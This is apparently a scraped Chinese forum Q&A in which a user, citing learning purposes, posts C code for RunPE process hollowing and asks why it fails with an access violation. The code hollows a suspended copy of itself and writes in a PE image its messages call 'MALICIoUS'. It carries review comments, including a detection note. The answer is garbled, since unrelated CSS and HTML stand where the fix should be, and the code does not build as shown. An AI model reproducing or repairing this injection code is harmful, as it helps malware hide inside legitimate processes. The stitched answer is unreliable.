如何解决为什么我得到0xc00000005?
我正在尝试使用RunPE技术(用于学习)。
首先,我在 Windows XP(32 位)上尝试了此操作,没有出现任何错误,但注入的代码(HelloWorld)并未运行。
然后,我尝试在Windows 7和10(64位)上使用它,并在线程恢复时收到此错误[0xc00000005]。为什么会出现此错误,为什么注入的代码无法在XP计算机上运行?
我也尝试过取消映射映像基址(0x00400000),但遇到了同样的问题。
我的代码:
/*
 * runPe: takes a pointer to a PE image held in this process's memory, starts
 * a second copy of the current executable in a suspended state, copies the
 * image's headers and sections into memory allocated inside that child,
 * rewrites the child's initial thread context and resumes the thread.
 * This is the pattern usually called RunPE or process hollowing.
 *
 * Returns -1 after printing a message when the NT signature check or one of
 * the checked API calls fails. Returns 0 otherwise, including when
 * CreateProcessA itself fails, because that branch has no else.
 * The -1 paths taken after process creation do not close the process/thread
 * handles or end the suspended child, so a failed run leaves a suspended
 * process behind.
 *
 * NOTE(review): the listing as scraped does not match the Win32 headers:
 * identifier casing is altered (PROCESS_informatION, GetmodulefileNameA,
 * Getthreadcontext, Setthreadcontext, SizeOfheaders) and several calls carry
 * fewer arguments than the documented prototypes, so it will not build as
 * shown.
 *
 * Defender note: the observable chain is a process created with
 * CREATE_SUSPENDED, followed from the same parent by a cross-process
 * VirtualAllocEx with PAGE_EXECUTE_READWRITE, repeated WriteProcessMemory
 * calls, a thread-context write and ResumeThread. Endpoint telemetry that
 * correlates these events per parent/child pair is what flags this pattern.
 */
int runPe(void* image) {
IMAGE_DOS_HEADER* dosHeader;
IMAGE_NT_HEADERS* ntHeader;
IMAGE_SECTION_HEADER* sectionHeader;
CONTEXT* ctx;
PROCESS_informatION pinfo;
STARTUPINFO sinfo;
int i;
DWORD* ImageBase = NULL;
void* pImage = NULL;
char currentpath[1024];
GetmodulefileNameA(0,currentpath,1024); //path to the current exe
//Locate the DOS and NT headers of the supplied image.
//e_lfanew is used exactly as read from the buffer; nothing here checks the
//DOS magic or that the offset stays inside the buffer (no length is passed in).
dosHeader = (PIMAGE_DOS_HEADER)(image);
ntHeader = (PIMAGE_NT_HEADERS)((DWORD)image + dosHeader->e_lfanew);
//Checks if this is a PE FILE
if (ntHeader->Signature == IMAGE_NT_SIGNATURE) {
ZeroMemory(&pinfo,sizeof(pinfo));
ZeroMemory(&sinfo,sizeof(sinfo));
//The child is the current executable itself, created suspended so its
//primary thread does not run before the steps below.
if (CreateProcessA(currentpath,NULL,FALSE,CREATE_SUSPENDED,&sinfo,&pinfo)) {
printf("[*] Suspended process is created\n");
//The Sleep(600) calls only pace the progress messages.
Sleep(600);
//Allocate memory for the context of suspended process
ctx = (LPCONTEXT)(VirtualAlloc(NULL,sizeof(ctx),MEM_COMMIT,PAGE_READWRITE));
if (ctx) {
ctx->ContextFlags = CONTEXT_FULL;
printf("[*] Context is allocated successfully\n");
Sleep(600);
//Get the thread context
if (Getthreadcontext(pinfo.hThread,(LPCONTEXT)ctx)) {
printf("[*] Allocating MALICIoUS image headers into the suspended process\n");
Sleep(600);
//Reads 4 bytes from the child at Ebx + 8 into ImageBase; the result of the
//call is not checked. Presumably this is the image-base field of the child's
//PEB on 32-bit x86 - confirm.
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(ctx->Ebx + 8),(LPVOID)(&ImageBase),4,0);
//Cross-process allocation of SizeOfImage bytes, readable, writable and
//executable at once; RWX memory requested in another process is a common
//detection signal.
pImage = VirtualAllocEx(pinfo.hProcess,ntHeader->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if (pImage) {
printf("[*] Allocating memory for MALICIoUS image headers into the IMAGE_BASE\n");
Sleep(600);
//Copy the image's headers to the start of the remote allocation
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)pImage,image,ntHeader->OptionalHeader.SizeOfheaders,NULL)) {
printf("[*] Writing memory for MALICIoUS image headers into the IMAGE_BASE\n");
Sleep(600);
//sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
//Walk the section table and copy each section's raw data to
//pImage + VirtualAddress in the child.
for (i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
{
//248 presumably stands for sizeof(IMAGE_NT_HEADERS) on 32-bit, as in the
//commented-out line above - confirm.
sectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)image + dosHeader->e_lfanew + 248 + (i * sizeof(IMAGE_SECTION_HEADER)));
//Sections with no raw data on disk are skipped
if (sectionHeader->SizeOfRawData == 00000000)
continue;
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)((DWORD)(pImage) + sectionHeader->VirtualAddress),(LPVOID)((DWORD)image + sectionHeader->PointerToRawData),sectionHeader->SizeOfRawData,0))
{
printf("[*] Allocating memory for Section %d at %X\n",i,(LPVOID)((DWORD)pImage + sectionHeader->VirtualAddress));
Sleep(600);
}
else
{
printf("ERROR: Writing section (%d) into memory Failed\n",i);
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
//Overwrite the field at Ebx + 8 in the child (the same address read earlier)
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),0)) {
printf("[*] Image base address is changed to MALICIoUS\n");
Sleep(600);
//Point the saved Eax of the suspended thread at the copied image's entry
//point (remote base + AddressOfEntryPoint)
ctx->Eax = (DWORD)pImage + ntHeader->OptionalHeader.AddressOfEntryPoint;
printf("[*] AddressOfEntryPoint is changed to MALICIoUS\n");
Sleep(600);
//Set Thread Context and resume it; neither call's result is checked, so
//"Thread is resumed" is printed regardless of the outcome.
Setthreadcontext(pinfo.hThread,(LPCONTEXT)ctx);
ResumeThread(pinfo.hThread);
printf("[*] Thread is resumed\n");
}
else
{
printf("ERROR: Change the imageBase address from the suspened process into the MALICIoUS Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Writing the image into the process address space Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Allocating memory for MALICIoUS image headers into the IMAGE_BASE Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Getthreadcontext Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
else
{
printf("ERROR: Context allocation Failed\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
//Reached on success and also when CreateProcessA failed (no else branch above)
return 0;
}
else
{
printf("ERROR: Invalid nt SIGNATURE\n");
printf("Error Code: %d\n",GetLastError());
return -1;
}
}
解决方法
现在可以运行了。我认为错误出在把映像基址(ImageBase)改写为注入代码的地址这一步。
我认为错误在这里:
/* NOTE(review): these style rules (#block, .pLined, #div) look unrelated to
   the RunPE question on this page; they were probably inserted by the page
   extraction in place of the answer's own snippet. */
#block {
position:relative;
}
.pLined {
position:relative;
}
.pLined > span {
display:block;
}
#div {
position:absolute;
display:none;
color:white;
/* rgba() is given only two components here; some were likely lost in extraction */
background-color:rgba(255,0.75);
top:auto;
left:auto;
z-index:1;
}
#div.toLine {
display:block;
}
已修改(错误是指向图像缓冲区的指针错误)
<!-- NOTE(review): this markup (a paragraph of five text lines, a button and an
     empty div) looks unrelated to the RunPE answer around it; it was probably
     inserted by the page extraction in place of the answer's own snippet. -->
<div id="block">
<p class="pLined">
<span>Line 1 Text</span>
<span>Line 2 Text</span>
<span>Line 3 Text</span>
<span>Line 4 Text</span>
<span>Line 5 Text</span>
</p>
<button id="btn">Div</button>
<div id="div"></div>
</div>
然后使用 NtUnmapViewOfSection 取消映射映像基址:
if (WriteProcessMemory(pinfo.hProcess,(LPVOID)(ctx->Ebx + 8),(LPVOID)(ntHeader->OptionalHeader.ImageBase),4,0))